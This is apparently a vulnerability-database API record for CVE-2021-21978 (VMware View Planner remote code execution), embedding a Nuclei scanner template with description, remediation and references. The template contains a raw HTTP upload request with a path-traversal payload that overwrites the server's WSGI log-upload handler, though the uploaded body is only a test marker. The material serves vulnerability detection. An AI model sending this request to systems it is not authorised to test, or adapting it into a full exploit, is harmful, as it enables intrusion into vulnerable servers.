{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2021-21978/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2021-21978/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2021-21978/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2021-21978/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2021-21978/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2021-21978"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2021-21978"
    }
  },
  "data": {
    "nuclei": true,
    "nuclei_template": "http/cves/2021/CVE-2021-21978.yaml",
    "nuclei_template_severity": "critical",
    "nuclei_template_yaml": "id: CVE-2021-21978\n\ninfo:\n  name: VMware View Planner <4.6 SP1- Remote Code Execution\n  author: dwisiswant0\n  severity: critical\n  description: |\n    VMware View Planner 4.x prior to 4.6 Security Patch 1 contains a remote code execution vulnerability due to improper input validation and lack of authorization leading to arbitrary file upload in logupload web application.\n    An unauthorized attacker with network access to View Planner Harness could upload and execute a specially crafted\n    file leading to remote code execution within the logupload container.\n  impact: |\n    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.\n  remediation: |\n    Upgrade to VMware View Planner version 4.6 SP1 or later to mitigate this vulnerability.\n  reference:\n    - https://twitter.com/osama_hroot/status/1367258907601698816\n    - https://nvd.nist.gov/vuln/detail/CVE-2021-21978\n    - https://www.vmware.com/security/advisories/VMSA-2021-0003.html\n    - http://packetstormsecurity.com/files/161879/VMware-View-Planner-4.6-Remote-Code-Execution.html\n    - https://github.com/HimmelAward/Goby_POC\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2021-21978\n    cwe-id: CWE-20\n    epss-score: 0.99005\n    epss-percentile: 0.99929\n    cpe: cpe:2.3:a:vmware:view_planner:*:*:*:*:*:*:*:*\n  metadata:\n    max-request: 1\n    vendor: vmware\n    product: view_planner\n  tags: cve2021,cve,vmware,rce,packetstorm,fileupload,intrusive,vkev,vuln\n\nhttp:\n  - raw:\n      - |\n        POST /logupload?logMetaData=%7B%22itrLogPath%22%3A%20%22..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fhttpd%2Fhtml%2Fwsgi_log_upload%22%2C%20%22logFileType%22%3A%20%22log_upload_wsgi.py%22%2C%20%22workloadID%22%3A%20%222%22%7D HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: multipart/form-data; boundary=----WebKitFormBoundarySHHbUsfCoxlX1bpS\n        Accept: text/html\n        Referer: {{BaseURL}}\n        Connection: close\n\n        ------WebKitFormBoundarySHHbUsfCoxlX1bpS\n        Content-Disposition: form-data; name=\"logfile\"; filename=\"\"\n        Content-Type: text/plain\n\n        POC_TEST\n\n        ------WebKitFormBoundarySHHbUsfCoxlX1bpS\n\n    matchers-condition: and\n    matchers:\n      - type: dsl\n        dsl:\n          - \"len(body) == 28\"\n\n      - type: word\n        part: body\n        words:\n          - \"File uploaded successfully.\"\n\n      - type: status\n        status:\n          - 200\n# digest: 4a0a00473045022100db29a9a778b34131bd4230e61f52ad9592d45bd2e7cf9c0403fa0597183c637202203cdf8807ac34b2905d968fce824bc827c5c56ff6e6c839182e1ad2bb909f03aa:922c64590222798bb761d5b6d8e72950"
  },
  "source": "nuclei",
  "vuln_id": "cve-2021-21978"
}